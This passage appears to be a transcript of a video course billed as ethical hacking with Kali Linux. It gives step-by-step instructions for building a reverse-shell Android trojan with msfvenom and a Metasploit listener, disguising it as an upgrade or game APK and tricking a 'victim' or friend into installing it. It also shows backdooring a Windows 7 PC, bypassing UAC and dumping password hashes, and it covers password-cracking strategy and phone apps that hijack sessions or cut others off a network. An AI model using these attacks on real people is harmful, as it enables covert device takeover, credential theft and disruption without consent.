spoofer. He can go ahead and run multiple spoofs at one time. He can go ahead and redirect all my traffic to somewhere else. He can go ahead and hijack my session, my YouTube session, Facebook session, and let's say, for example, if I'm viewing this network spoofer specific thing on my computer and the person who is actually using network spoofer, he can replace all these specific terms to something else, such as troll. So whenever I see network spoofer, I'll see only troll written everywhere. He can go ahead and delete random words from these websites. So if I go ahead and click this specific website, I won't even see many things from this website. Or if you go ahead and delete solution, then wherever there is written solution in this web page, it will disappear. He can go ahead and flip images, flip tiles, reverse different types of title, troll face. He can send that to, or he can even go ahead and do different types of man-in-the-middle attacks, such as running it passively so that we won't be able to detect, or waiting for the Wi-Fi connection and then DDoSing it and gaining access to that. So this is another version of different type of attack that you can go ahead and run through the network spoofer. After that, after network spoofer, we have the Wi-Fi analyzer, which is a very great tool. If you're an Android user, then you can go ahead and download the, go ahead and purchase the Wi-Fi Spectrum Analyzer. And actually this was for the iOS. Let me check. It only supported iOS. Yeah, Wi-Spy, perfect. Okay, yep, it is Wi-Fi. So Wi-Fi is a specific device that only connects to iPhone, through which you can go and detect any kind of network activity going on near you. Let's say, let it be, let's say, through Bluetooth connections, or let's say through data transferring through Wi-Fi, or any other thing, any random thing, it will go ahead and detect it. So this is one port, but we are not looking into iOS. So if you only want to go ahead and analyze the Wi-Fi, then I have Wi-Fi Analyzer for you, and you can go and download it from over here. It will show you from where exactly what exactly is the speed of the specific Wi-Fi and which has the highest speed or the highest connection near you. So you may think that, okay, what's the big deal in that? Because I can also go ahead and see that on my Wi-Fi connection inside my phone, how much speed I'm getting. But the thing is that it shows you the exact thing which you will not be able to see on your normal Wi-Fi. And you can go ahead and detect exactly where the network connection is, and you can go ahead and actually search where the exact network is coming from. So that's what this Wi-Fi does. And finally, we have the Wi-Fi kill, and you can go ahead and download it from over here, or this is the official website, that's paranoid.me for Wi-Fi. This is the version for Wi-Fi downloader. What this does is that it actually goes ahead, and I'll just go ahead and show you the image for that. Okay, this is how it looks like. It can go ahead and it searches all the IP address and MAC IDs of specific computers that are there on the LAN, and you can go ahead and stop transferring data to any of the specific computer that you want. You don't need to actually go ahead and know which exactly computer they are or which network they are. You can go ahead and stop, be anyone who is actually accessing through iPhone or Linux or through any kind of, it doesn't matter which system they are using. Any device they're using to go ahead and access the web, you can go ahead and stop their internet just by one click through Wi-Fi kill. And you don't even have to need to know much information about networking or any other thing. The start of Wi-Fi kill, but you need to have root access to run all of these things, else you won't be able to run these things. So the first thing that you would need to do would be to go ahead and root your Android. So you can also find different, we also have Wireshark, and for Play Store, which has a different name, I believe. Yeah, it has, the name is Interceptor NG, that we have on our Play Store, that you can go ahead and sniff different traffics on the Wi-Fi. Then we have, let's say, Shark for root, that can also do the same thing, for that can ping different things and dump different packets on the Wireshark. So this way you can also go ahead and search for a lot of things. I have shown you the important parts that can be used, the applications that can be used through Android to hack into a system or trace or sniff their Wi-Fi stuff. So that is it for this tutorial, guys. In the next tutorial, I'll be teaching you how we can go ahead and hack into a Android system rather than hacking from an Android system, and we would be using Kali Linux for doing this thing. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you about the different applications we could use to go ahead and sniff, hack, and DOS a specific router or any other machine through a cell phone, and how we could also go ahead and use Kali Linux on our own cell phone. So but that's not it. Even though the Android is based on Linux, it is still insecure. And when I say insecure, it means any person can go ahead and let's say make you, or let's say, for example, I'm not getting the exact term over here. Okay, he can actually go ahead and fool you into downloading something and running it as an application. But when you actually go ahead and run that, you could see that it is not the exact application. And finally, your system will be hacked. So I'll just go ahead and start it over here, and I'll be going ahead and hacking. I'll be teaching us how we can go ahead and hack into the specific Android system, may it be Lollipop or Jelly Bean, or it doesn't matter which one you're using. It works on almost everyone, as far as I have checked on Google Galaxy Nexus 5, Nexus 4, Nexus 6 as well. I have also used it on the Note 3, Note 4, Xperia Z, Z2, and different versions of the Micromax cell phones as well. So let's go ahead and I'll teach you as to how you can do that. I don't have any cell phone at this point of time, but I'll be showing you exactly how it works so that it will be easier for you to understand. And for this specific thing to run, the unknown sources must be ticked. I'll just show you how it looks like. The unknown sources must be ticked on the computer's on the person's cell phone, so that our application run, else it will not run. As you can see, the when you go into settings, unknown sources should be ticked. Most probably nowadays people already have these sources ticked, but if not, then if you need to go ahead and social engineer your way to go ahead and make your target tick this specific thing in order for you to go ahead and install that app. Perfect. So this is a tutorial explaining how to go ahead and hack Android phones with Kali Linux, and the first thing that we would need to do would be to go ahead and fire up our Kali Linux. So once we have this, I need to go ahead and make a Trojan period APK file, and you can go ahead and do this by typing msf payload or msf venom space Android. Let me check if the payload is still working. Okay, payload is still working, but I believe that has been deprecated. Let me check. Yes, payload is deprecated. So we will be using msf venom instead.
and type android slash meterpreter slash reverse underscore TCP lhost equals to, write down your own IP address, and for me it would be, just type ifconfig, and I'll just copy this and paste it over here, and I'll type slash root slash upgrader period apk, and just replace the host with your own IP address. You can also hack Android on WAN, that is wireless area network, that is through internet, by using public or external IP in your L host or your local host, and by port forwarding. And you can go ahead and see port forwarding in one of my previous tutorials. I won't be teaching you that. And just hit enter. Let's wait till this gets completed. So I believe upgrader.apk should be created in my home directory. Yes, perfect. So I have this upgrader period APK. So this specific file, I need to go ahead and send this to my target's machine, and just open another terminal, and we need to go ahead and start our MSF console, so that as soon as the person goes ahead and install this, we will get a meterpreter session opened over here, that we could go ahead and use our root or directory to go ahead and do anything that we want in the person's Android cell phone. So just type MSF console over here, and it will start the MSF console. Let's wait till that happens. Okay, so we have our MSF console up and running, and now what we need to do is that we need to go ahead and set up a listener. So, and we need to go ahead and load the multi-handler exploit, so that as soon as the person starts, our listener will already be on, and we will already go ahead and get a reverse TCP connection over here. And as you see, if you see it properly over here, what I did was that I created a reverse TCP connection over here. So by doing that, whatever the person, I think this upgrader has a problem. I'll just delete that, and I'll create a new one because there was a spelling mistake. It should be reverse score TCP. Perfect. Okay, as you can see, my new file has been created. I believe it's under construction. Yep, 0 bytes. Perfect. So I have this upgrader period APK that I need to send this to my target, and before I send it, I need to go ahead and set up the listener, so that as soon as the person installs, I will have the listener ready to fire up. And so I could go ahead and do that by typing use exploit slash multi slash handler, and I'll hit enter, and our multi-handler will be started. So now we need to go ahead and set up a payload by typing set payload Android, because this multi-handler will be can be for anything, Linux, Windows, or any other operating system. So we need to set this specifically for Android. So we need to type set payload Android slash meterpreter slash reverse underscore TCP, and I'll just go ahead and hit enter, and it has been set. The payload is set to meterpreter Android reverse TCP. Now we need to go ahead and set our local host. So I'll just type lhost and go ahead and type your IP address, and I'll just go ahead and, okay, I mistakenly opened the iceweasel. Let me just close it first, and I'll type ifconfig, copy it and paste it over here. So this will be my local host where the connection would be coming in back. And if you are going at hacking this specific Android on a wireless network that is on, let's say for example, like as of now, I am going ahead and using this on a VMware. And if I'm going to go ahead and hack on a wireless network, not on a LAN, and when I say LAN, I mean by a wireless Wi-Fi network. If your Android is not on a Wi-Fi network, then you need to go ahead and use your actual IP address that would be over here. Okay, Windows system 32, and I'll just go ahead and run
Perfect. So this would be the IP address that I would be needing to set over here. And as of now, I will be assuming that we are on a local area network. So I'm using the internal IP address. If you're not on local area network, then if you're on you hacking someone through internet, then you need to go ahead and use the IPv4 and then port forward your this specific thing to over here. And in order to port forward, you can go ahead and see whether it's select. You can type. It's okay. You can type this and see whether your port is forwarded. If not, then you can go ahead and specifically port forward by go ahead and editing it by typing nano. It will open this specific port forward file in nano editor and just change this 0 to 1. Type Control X. It will ask you whether you want to save, type Y and enter. Perfect. And again, go ahead and see whether, yes, perfect. It's 1. That means its port forwarding is on. So I'll just minimize this for the time being. And this would be my IP address. I have forwarded this port. So I'll just go ahead and hit enter. So I have set up the L host. And at the last type, now we need to go ahead and exploit to start the listener. So just go ahead and copy this application file to your root directory of your Android phone. And when I say root, I mean your internal SD card, or go ahead and send it to any specific person using a Dropbox or uploading to any sharing website like Speedy Share by renaming it to any game APK file or something, and send this link to that website. We'll go ahead and download it to your friend's phone or exploit their phones through this. And it should be only on LAN, but if you're using a WAN method, then you can use the exploit anywhere on internet. And you need to include something. If you are sending it through email, you need to something in the email telling them how to actually enable these unknown sources. Most phones nowadays already have these enabled by default. And let the victim install this upgrader peer APK, as he would think it is meant to upgrade his file, some new features on his phone. However, the option of allowance for installation of apps from unknown sources should be enabled. If not, and as soon as he goes ahead and runs this specific file, I can go ahead and type sessions-l. And as of now, there are no active sessions because I have not yet started this on my specific cell phone. But if I had installed this, then I can go ahead and straight away install this specific thing on my cell phone, and my interpreter session will be open. And while you used to have to start the listener with the private IP address because it tells the listener that which PC is in network, we will be using our internal IP address as of now. If you are using trying it for WAN, then you need to go ahead and use the external IP address and make sure that the port that you would be using would be 4444 or 8080. That would be in Kali's internal IP. Kali's. And the service type will be TCP or UDP. If you're using VMware, then you need to make sure that you switch off your antivirus firewall so that it will allow the connections to the VMware virus. That's it. And another solution that be if you have the default DMZ option, enable it in the Kali Linux. This will forward all the ports. Also, this won't open the ports, but it will only forward, and it will only forward them. So if you are testing something for port open services, they will tell you where the ports are closed. So you don't need to worry that someone can go ahead and gain access to your computer. So that's it for this tutorial, and I have already taught you how we can go ahead and access into any of our target's computer as well as their phone. So that's it for the basic Android and hacking stuff with Kali Linux. And in the next tutorial, which I would be starting from next time onwards, that would be the advanced Kali Linux. I would be teaching you everything in detail as to how we can go ahead and use these Hydra, Burp Suite, John to go ahead and crack different network things, SQL mapping, and that would be lots of other stuff, and it would be much more in detail. But you need to know all of these things in detail, in specific, so that you exactly know what we are doing, because if you go ahead and straight away jump to my next tutorial, you won't be able to understand a bit, and you need to go ahead and have these basic things done already. So that's it guys for this tutorial. Have a nice day ahead. See you later. Bye. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux, and this is for the advanced tutorial. So I've already done few tutorials related to ethical hacking and penetration testing in my previous version, that's the basics for Kali Linux. If you have not gone through that, then I would probably recommend going through that. The reason being that if you want to proceed with this course properly, then you need to know the basics for that, and you will only get that when you go ahead and do the basics for penetration testing that I have taught you before. So speaking about password cracking, including ones for Linux, Windows, WEP, WPA2, that's for wireless, and even online passwords using THC Hydra, we can now go ahead and crack any type of passwords using Kali Linux.
Now, I thought it might be worthwhile to begin a series on password cracking in general, and password cracking is both an art and a science. And I hope to show you the many ways and the subtleties involved in this. So we will start with the basic principles of password cracking that are essential to all password cracking techniques, followed by some of the tools and technologies used. Then one by one I'll show you how to use those principles and techniques effectively to crack or capture various types of passwords out there. So the first thing would be the importance or and methods of password cracking. So passwords are most widely okay. Just let me go ahead and start up my VMware. Okay, so passwords are like most widely used form of authentication throughout the world. Let me just start it. Okay. A username and a password are used on computer systems, banks, accounts, ATMs, and many more. The ability to crack password is an essential skill to both a hacker as well as the forensic investigator. Whereas the forensic investigator needs to hack the passwords for accessing the suspect's system, hard drive, email account, etc. Although some passwords are extremely easy to crack, some may be extremely difficult as well. And in those cases, the hacker or the forensic investigator can either employ greater computing resources such as a botnet, supercomputer, using the GPU or ASIC, etc., or they can look to obtain the passwords in other ways. And these ways might include insecure storage. In addition, sometimes you don't need a password to access the password protected resources. For instance, let's say for example, if you go ahead and replay a cookie, session ID, Kerberos ticket, and authenticated session, or other resources that authenticates the user after the password authentication, you can access the password protected resource without ever knowing the password. So if you want me to make this more clear, let me give you an example for that. I'll just go ahead and open the Facebook web page. Okay, I believe this is denied. Okay, so I still have other ways to access that. Let me go ahead and just open this up. Let me check if I could go ahead and access that. Okay, let's check. Okay. Okay, I believe I won't be able to. Okay, let me take to you to a Gmail account. Gmail probably I'll be able to log in, I believe. Okay, perfect. So I'll go ahead and show you a few different ways. The first thing would be actually going ahead and hacking the password, and it can be through like using the keylogger or keystroke login. Or the second thing would be to actually go ahead and get the hash keys and convert that the MD5 or SHA5 or whichever it is the format is. Or we could actually go ahead and trick the user by using social engineering. Or there's another way of cookie hijacking or cookie stealing. And cookie stealing means that, let's say for example, if I go ahead and access my Gmail account for once, after that I don't actually log out. Or let's say for example, I log out, but over here when I am logging in, it will ask me to save the password, and I will save the password. So whenever next time I'm trying to log in, it will automatically go ahead and show me the passwords. So getting those cookies over the internet without me accessing this computer is called as cookie hijacking or cookie stealing. So as I told, there are different ways to actually go ahead and do that. So sometimes these attacks can be much easier than cracking a complex and a long password. I will do a few tutorials on actually how we can go ahead and crack these passwords on various replay attacks in the near future. And look out specifically for my upcoming tutorial on stealing the Facebook cookie to access someone's Facebook account. You can do that as well. Not only Facebook, but also Gmail and Yahoo or any kind of other accounts. It doesn't matter which exactly until unless they are, let's say, they're actually accessing their account over the internet. So let's start with the basics. The first thing would be the password storage. In general, passwords are not stored in clear text. As a rule, passwords are stored as hashes. Hashes are one-way encryption that are unique for a given input. And these systems often use MD5 or SHA-1 to hash the passwords. So I'll just go ahead and show you as to how it exactly looks like. Let me see. Okay, so I'll just go ahead and open this. I'll just show you the image. So this is how a hash password looks like. So this is the actual stuff that's ABCD. It's converted into the hash one. We have 120 and that's again converted, and this is how it looks like in total. So it's just a one-way encryption. It cannot be decrypted back, but there are still ways that we can go ahead and try to do something else. So in Windows operating system, passwords on the local system are stored in the SAM file, while Linux stores them in /etc/shadow file. So these files are accessible only by someone with the root or the system admin privileges. In both cases, you can use a service or file that has root or system admin privileges to grab the password. For let's say, for example, DLL injection with samdum.dll in Windows. And actually, if you go and look at my previous tutorials, I have shown you different ways as to how I can go ahead and gather access to a victim's PC and then go ahead and manipulate that. And by doing that, you can also go ahead and gather the samdum.dll in Windows. And as of Linux, I'll just go ahead and show you exactly where the password is. File system, etc, and this shadow. This is the one. So this is exactly how it looks like, and the passwords are stored over here, and I believe these are the hash keys for my passwords. So I won't be actually going ahead and doing something to that, because if I did, I won't be able to log in myself. So there are different types of attacks to proceed with. First of all, so the first type of attack is a dictionary attack. A dictionary attack is the simplest and the fastest password cracking attack. To put it simply, it just runs through a dictionary of words, trying each one of them to see if they work. Although such an approach would seem impractical to do manually, but computers can do this very fast and run through millions of words in just a few hours. And millions is more than enough. And this should usually be your first approach to attacking any password, and in some cases, it can prove successful in just a few minutes, because normally people always keep their passwords very easy. Let's say, for example, root@123 or admin@123, admin +123, admin #123, or these are the different types of attack, or password@123, and when I say password, the A will be replaced by @ and S will be replaced by the $sign, and O will be replaced by zeros, something like that. And these passwords are very easy to crack, even if you think that they are not. And that's how dictionary attack works like. And after that, we have the rainbow table. Most modern systems now store passwords in hash. This means that even if you can get to the area or the file that stores the password, what you get is an encrypted password, as I showed you just now over there in the etc shadow file. One approach to cracking this encryption is to take the dictionary file and hash each word and compare it to the hashed password. This is very time and CPU consuming or intensive. A faster approach is to take a table with all the words in the dictionary already hashed and compare the hash from the password file to your list of hashes. If there is a match, you know the password then. And after that, we have the brute force method. Brute force method is the most time consuming approach to password cracking. It should always be your last resort. Brute force password cracking attempts. It attempts all possibilities of all the letters, numbers, special characters. This might be combined for a password, and it will attempt them. As you might expect, the more computing horsepower you have, the more successful you will be with this approach. So normally people don't use this, or they rarely use this. That's what I can say. After that, we have the hybrid. A hybrid password attack is one that uses a combination of dictionary words with special characters, numbers, etc. Often these hybrid attacks use a combination of dictionary words with numbers appending and prepending them, and replacing letters with numbers and special characters, as I told you before about the password. P at the rate dollar W0RD123, something like that. And that's what a hybrid attack is. And there are also commonly used passwords. So as much as we think each of us is unique, and we do show some common patterns of behavior within our species, that's humans. One of these patterns is the words we choose for passwords. There are a number of word lists that have been compiled of common password. In recent years, many systems have been cracked and passwords captured from millions of users have been destroyed and displayed to the whole public. By using these already captured passwords, you are likely to find at least a few on the network that you're trying to hack. So, and that would be it for this tutorial, guys, because that's how exactly these are the different ways as to how we can go ahead and crack these passwords. In the next tutorial, I'll be continuing with the password cracking strategy and the softwares that we would be using to actually go ahead and hack into some specific systems. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the last tutorial, I started off my password cracking series with an introduction on the principles and techniques involved in the art of cracking passwords. In the previous tutorial, I showed some specific tools and techniques for cracking Windows, online, Wi-Fi, Linux, and even SMP passwords. And this series is intended to help you improve your skills in each of these areas and expand into some untouched areas. Very often, hackers new to password cracking are looking for a single tool or technique to crack passwords. But unfortunately, in reality, that does not exist. Like they show in the movies that you cannot just go ahead and type something, 2-3 line of code and you can hack. That's not possible in the real world. But that's fortunate for network security though. Each type of password requires a unique strategy tailored to that specific situation. The situation can be the type of encryption, such as MD5, SHA1, NTLM, etc. Remote versus offline, salted or unsalted, and so on. Your password crack strategy must be specific to that situation. So in this tutorial, I want to discuss about the extreme password cracking strategies. Many new password crackers simply run their password cracking tool and expect a breakthrough, but that does not happen. They will run a huge word list and hope for the best. If it doesn't crack the password, they're lost. They will think that maybe they will just leave their hope completely. Here I want to develop a multi-iteration strategy for password cracking that will work on the vast majority of passwords, though not all. No strategy will work on all passwords with the exception of the CPU and time-intensive brute force cracking. So let me tell you something about how we could go ahead and develop password cracking strategy. I will assume here that we are after more than a single password. Generally, password cracking is an exercise of first capturing the hashes. In Windows system, these are in the SAM on the local Unix files, and then we have the other one, the etc, shadow, and Linux. Let's say, for example, Linux and Unix use MD5 and modern Windows use HMAC MD5. Other systems may use SHA1, MD4, NTLM, etc. Make certain you know what hash is being used on the system you are trying to crack. Otherwise, you will spend hours or days without having satisfactory results. All that being said, John the Ripper has an automatic hash detector that is correct almost 90% of the time, but when it is wrong, there is no way to know. In Cain and Abel as well as the Hashcat, I must tell the tool what type of hash we are cracking or we are trying to crack, else it will not work. So, brute force attack passwords are short passwords. Although it might seem contrary to common sense, I often start by trying to use brute force for very short passwords. Although brute force of long passwords can be very time consuming, it can be days or weeks, but very strong passwords can be brute forced in a matter of minutes. And I start by trying to use brute force or 6 characters less. Depending upon my hardware, this can usually be accomplished in a matter of minutes or hours. In many environments, this will yield at least a few passwords. In addition, I'll also try to brute force all numeric passwords at this stage. Number passwords are the easiest to crack, and 8-character numeric password only requires that we try 100 million possibilities. And even a 12-character number password only requires 1 trillion possibilities. And you may think that is huge, but with powerful hardware, we can do this barely, let's say example, without even wasting a single time. So here we have configured Cain and Abel to brute force 6-character password that are only numbers. So the first would be a low hanging fruit, to be more precise. Once I have broken a few short passwords by brute force, I'll still likely have a file that has many hashes in it. If you're trying to compromise an institutional or corporate network, we usually only need to crack a single password to begin the network compromise. Although the user whose password is cracked may have limited rights and privileges, there are many ways to escalate privileges to system admin or root. This means that if we crack a single password on a network, we can likely take down the entire network. All of the above have been said. Let's next go after any low-hanging fruit. That means let's go after these passwords that are easiest to crack. For instance, if we now use the institution that has a password policy that all passwords must be 8 characters. Many people will make their passwords the absolute minimum, that is just 8 characters. To attempt a quick and dirty pass on these hashes, simply choose a list of dictionary words that are 8 characters. Running through the millions of words in such a list will generally take over approximately a few hours, and it's more likely to yield a significant portion of the passwords. Or the second point being social engineering, just try common passwords. Human beings, although we think are unique, tend to think and act similarly, but we're just like a pack of animals. We follow the herd and act similarly. The same can be said for passwords. Users want a password that fulfills their organization's minimum password policy, but it's also easy to remember. That's why we will see passwords such as admin plus 123, admin@123, root@123, or something similar to that, or password@123, or hash, or one or two letters may change. So despite its obvious simplicity, it fulfills a password policy of minimum of 8 characters, uppercase and lowercase letters, a special character and a number. Believe it or not, this password and its variations are used numerous times. And knowing that humans tend to use these types of passwords, in my next iteration on the password hash list, I will try a password list of commonly found passwords, and numerous sites on the web include word list of cracked or captured passwords. In addition, you might try scraping the web to capture as many passwords as possible. The step 4 would be to combine words with numbers. Running through the low-hanging fruit in the step 2 and common words to passwords like step 3, it will likely yield at least a few passwords and the time it consumes is minimal. Next, we want to attack the remaining hashes and take the next step in complexity. In this iteration, we will run the remaining hashes through a list that's because the longer dictionary words and dictionary words with numbers are the toughest. Users, because they are forced to change passwords periodically, will often add the numbers to the beginning or the end of the passwords. Some of our password cracking tools like Hashcat and John the Ripper, they allow us to use rules to apply to word lists to combine words, append and prepend numbers, change case, etc. For hybrid attack, I usually crack 50% of the passwords in step 1 and step 4, but we have harder work ahead to crack the more intransigent passwords. These passwords will often include the special characters and combined words. This would include passwords such as, let's say for example, if I have passwords such as soccer mom, SOCC3RMOM, it will go ahead and crack that. If I want to write, let's say for next big thing, I would probably write N3XT B1GTH1NG. So these are literally strong passwords including special characters and numbers, but because they include variations of dictionary words, they're easily crackable and they're not that hard. After that, we need a password list that combines dictionary words with numbers and special characters. Fortunately, that is something that John the Ripper does automatically, but other password crackers that Cain enable does not necessarily. Hashcat can be run with one of its many rule sets to combine words and special characters to your word list. In this tutorial, I'll be going ahead and using the combinator rule in Hashcat that adds uppercase characters to combine words. Finally, if all else fails, we are left with brute force to go ahead and crack the password. This can be very slow with a single CPU, but as I told you previously, 1000 CPUs can do much faster. Even when we are left with a brute force attack, we can be strategic about it. For instance, if you know that password policy is a minimum of 8 characters, try brute forcing with just 8 characters. It will save you time and likely yield some passwords. In addition, you can choose your character set. Once again, if you know that password policy is uppercase, lowercase and a number, choose only those character sets to brute force. Finally, some password crackers like Hashcat have built-in policies that can choose to attempt the brute force method. These are similar to strategies that help by shaping your attacks based on the password construction protocol followed by a company group or name. These rules can be used in other password cracking tools such as John the Ripper, and here we will be seeing a list of rules in Hashcat as well. So in the end, it is very important to be successful at password cracking that you follow a systematic strategy. No matter what tool you are using, that requires multiple iterations to crack the passwords. This strategy generally works from the passwords that are easiest to crack and the most difficult to crack as well. Of course, this strategy will be a part, it will be dependent upon the tools you are using, the word list that you use, the password policy of the victim. Although I have laid out here my strategy of as to how I work, yours may be different and it may be needed to adapted or changed according to the work environment that you're working in. So, and that would be it from my end for this tutorial. In the next tutorial, I'll be actually teaching you as to how we could actually go ahead and crack these passwords. And I'll go ahead and show you how I can go ahead and actually use the interpreter prompt to crack my Windows password. And that's it for this tutorial.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, I'll be teaching you as to how we could go ahead and crack the Windows password from the secure accounts manager, that is from the SAM database. So what I would do is I would first go ahead and gain access to the victim's PC, and after that I would actually go ahead and try to crack his password. So the next time onwards, I won't actually have to go ahead and let's say I won't actually have to gain access to his computer since I would be already having the username and the password. So let's start with the Windows 7 computer, and I'll just go and enter my details. Okay. I'll use my password. Perfect. So it started, and I'll just go ahead and for the time being, I'll just disable my defender. Go back over here. So I'll first open my toolkit, and I'll select one because I would be doing a social engineering attack. I would be going ahead and creating a payload and sending it to my victim. I'll select 4, and over here I'll need to go ahead and insert my IP address. So I'll just type my config. So this is my IP address. I'll just copy it and paste it over here. I'm using a reverse TCP connection, so I'll use 2. I'll enter. I'll be using a backdoor executable so that I can gain access anytime. So I'll select 4 and I'll hit enter. The port would be 443. You can use any one which you want, but I would normally recommend 443 only. And just let this start. By the time this starts, I'll just go ahead and I believe it's in user share set. My file will be created over here, I believe. Yep, my file is created. I'll go ahead and start the listener. And I'll just go ahead and copy this file and paste it over here. Okay. Perfect. I'll just copy it and paste it over here. And let's see if my Metasploit is started. I'll just go ahead and send this to the person and do something so that he actually goes ahead and starts it. And I have my session open. Sessions is and what it did in short is that I actually checked how many sessions are open. Only one, so I use the ID 1. I means ID, so 1 to go ahead and access that. And now I'll just go ahead and check all the PIDs that were there so that I could go ahead and see exactly which things are available. So I'll just go ahead and type help. I'll just go ahead and expand this. So I would be dumping the hash database. As you can see, I have the option over here. But before that, I will just go ahead and migrate myself to something else. Let's see if I could do that without actually gaining access to the root system. So let me check. Let me check what would be. I believe it's PS. Yep, PS it is. And Windows Explorer .exe. The ID is 2376, I believe. Yep, so I'll just type
migrate 2376. 2376, right? Yeah, perfect. Migrated successfully, and now I'll go ahead and delete my payload from over here. Perfect. And my session should still be running. Perfect. Let's check. Perfect, everything is working. So now I need to go ahead and dump this Windows 7 dump file. So let me just go ahead and check. I just type HASH DUMP. Let's see what happens. Okay, privileges password get SAM hashes. The parameter is incorrect. So I believe that I would need to go ahead and let's say I would need to gain access to the system, that is the not the administrator, the system access to go ahead and do that. So I'll first go ahead and gain access to my system. So I'll just go ahead and try to use my another method, which would be run post windows gather has done. Let's see if that works. Okay, so I'll need to go ahead and get the system access before I could do that. So let's go ahead and get the system access now. So in order for us to do that, I'll first check whether I can go ahead and get access to system. So I'll just first type get UID. Okay, get UID. Okay, I'll just go ahead and check. UID, I believe. Okay, I have the system access. Let's try to get if I could get access to system. Okay, I won't. The reason being that I have user account control enabled over here. So now I'll need to go ahead and bypass the user account control. So I'll just go ahead and type it over here. Use privs and use priv, I believe. It's been already loaded. So I have my alternate one. We run post windows gather priv, and let's see what happens. Okay, so I only have these privileges right now. And now I'll just go ahead and background this session for the time being. The reason because I need to go ahead and bypass that. And now I'll go ahead and try to search everything related to UAC. Let's see what I think, or all the things that we get. So we have all of these things. So we would be going ahead and using the exploit bypass UAC. So I'll just go ahead and copy, and I'll just type use. Okay, paste. And okay, perfect. Now I need to go ahead and set the remote host and the local host. But before I go ahead and proceed, I need to go ahead and set the exploit. So under bypass UAC, so I'll need to go ahead and set the Windows reverse TCP, because I'm using the current meterpreter session right now. So I'll use set payload Windows meterpreter reverse TCP, and I'll hit enter. And now I'll go ahead and set the local host to my IP address, which would be this. And I'll go ahead and set the port. Local port would be, let's say for example 8080, and I'll go ahead and set the session 1, and I'll go ahead and try to exploit. Let's see what happens. Okay, PI is not. Yeah, perfect. It is done, I believe. Let's check. Probably I should have used another port, but let's check what we get when we use this port again. Okay, I'm getting the same error. I'll just go ahead and change the L port to 2960. Now let's go ahead and see what's happening. Okay, the IP address is perfect. The address listening port and the execution process. Let's go ahead and try to run this one more time. Maybe I used the wrong. Let me check if. Okay, I believe, let me check the error. It's showing that request HTTPS system executed. It's not a Win32 application. Okay, I get it. So instead of me using this payload reverse TCP, Just go ahead and select that once again. Okay, I'll just go ahead and do that once more. I'll just go ahead and exit the session and I'll do that once more. Let me check. Okay, I've exited the session and I'll again copy same file. Let's see what happens maybe. Okay. And just copy this specific payload and paste it over here. Okay, I already have it. So I'll just copy this, run it, and I'll just go ahead and spear phishing attack vectors. I'll just go ahead over here. So I'll just go ahead and copy all the codes that I have written over here and I'll just paste it over here. Okay, I'll just start my media MSF console. Perfect. I'll just exploit okay, let me check the IP address. Okay, session 1 is open. So I'll just go ahead and quickly go ahead and run post. Okay, I'm admin right now. Okay, I believe maybe the payload should have been in capital. I'll just go ahead and check. Never mind. Payload for 4. Set the outpost. And let's see. Maybe okay, I believe yeah, it's not even affection. Okay, the same reason. So I believe that the reason for this would be I'm trying to use 32-bit system. I'm trying to bypass the 32-bit system using this 64-bit application or payload. That's why. But once you have this, I'll just go ahead and background this one, and I'll go ahead and use. You can just run type sessions -i1 and okay, exit. Okay, again, I'll just type sessions 1. Okay, perfect. So what I could do, I could just go ahead and try to go ahead and dump the hash once you go ahead and gain access. You can probably go ahead and try to go ahead and create a different payload file. The reason being that I created a payload file which is of 64-bit, but I have this a 32-bit application, this 32-bit Windows system. That's why I just checked it over here. The reason it gave me it's not a valid Win32 application, and this is a 32-bit system file, whereas I was running this payload which is 64-bit. So you can just simply go ahead and run this hash dump example, and as soon as you go ahead and use this hash dump, then it will straight away go ahead and actually dump all the hashes that you have, and it will go ahead and automatically decrypt it and give you the exact password that you had. So that would be it for this tutorial. In the next tutorial, I'll actually go ahead and teach you how we could go ahead and crack Windows 7 password hash file with the proper method, as well as the Linux password without messing it up.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux, which is the advanced part. So in the previous tutorial, we saw a lot of things as to how we could go ahead and actually crack into multiple things, how we could crack the hash passwords of Windows, and many other things. So Kali Linux has lots and lots of potentials which we cannot even think of. So in this series on password cracking, I will go ahead and show you how we could actually go ahead and crack the hash passwords of our, let's say, our own Linux. But that would be the final part of this tutorial. After that, I will be teaching you what are the other ways as to how we can go ahead and do that. So let's go ahead and check how we could go ahead and crack the hash passwords. So continuing with my tutorials on how to crack passwords, I would now like to introduce you to one of the newest and the best designed password crackers out there, that is Hashcat. The beauty of Hashcat is in its design, which focuses on speed and versatility. It enables us to crack multiple types of hashes in multiple ways very fast. And just one thing guys, I'd like to tell you before I go ahead and with this tutorial, that in my previous tutorial, due to some or the other reason, the Windows 7 password, I was not actually able to go ahead and crack that. But the reason was that because I was not able to get the system access, but that's not a big deal, because if you go ahead and check one of my previous tutorial, you'll see that I easily cracked the hash password, as well as I went ahead and gained the system access. So the reason for that was in my previous tutorial because I had a hidden antivirus installed in my system, and it was not allowing it to go ahead and gain access to the system. But still I was able to go ahead and gain access to the default admin part. So I'll just go ahead and open it. So if you're trying to hack into someone else's PC and you're unable to gain access to them, don't get frustrated or don't get mad that you tried but it's not happening. There can be several reasons why you're not able to crack someone's password. Maybe the password is strong, but it's never too strong that you will not be able to crack that. So hacking is something that you need to keep on trying unless you actually go ahead and get that password, because there's always hard work that you need to do behind before you go ahead and get the successful fruits to your result. So as I mentioned in the previous parts of this tutorial, passwords are stored in a one-way encryption called as hashes, and there are multiple ways of obtaining these hashes, such as DLL injection in Windows system, or capturing the hash in transit, such as WPA wireless cracking, that is for our wireless LAN, that's Wi-Fi. So once we grab the hash for Windows, it will easily go ahead and crack that. That is, John the Ripper can easily crack that. But the next step becomes one of the finding of an effective and efficient way of cracking it. There are numerous tools, some of which I have highlighted in other articles here, but Hashcat is unique in its design and versatility. So let's take a look at how it works. So straight away go ahead and fire up your Kali Linux, and over here, before I go ahead and start it through my terminal, I'll go ahead and show you how we can open it through the graphical user interface. So just go ahead in the Kali Linux. Over here, go to applications, Kali Linux, and over here you can see the password attacks. Inside that you will see these offline attacks, and over here you can go ahead and see this Hashcat. So as you can see, these Hashcat can go ahead and crack these different types of hashes, which is quite more than sufficient for us, and it's an awesome tool, just to be clear. So when we click on the hashcat menu item, it opens the help screen. And at the top of the screen, you can see the basic hashcat syntax. Hashcat options, hash file, and mask word files and directories. So we can see some of the options for hashcat displayed before the basic syntax. Some of the most important of all are the hash 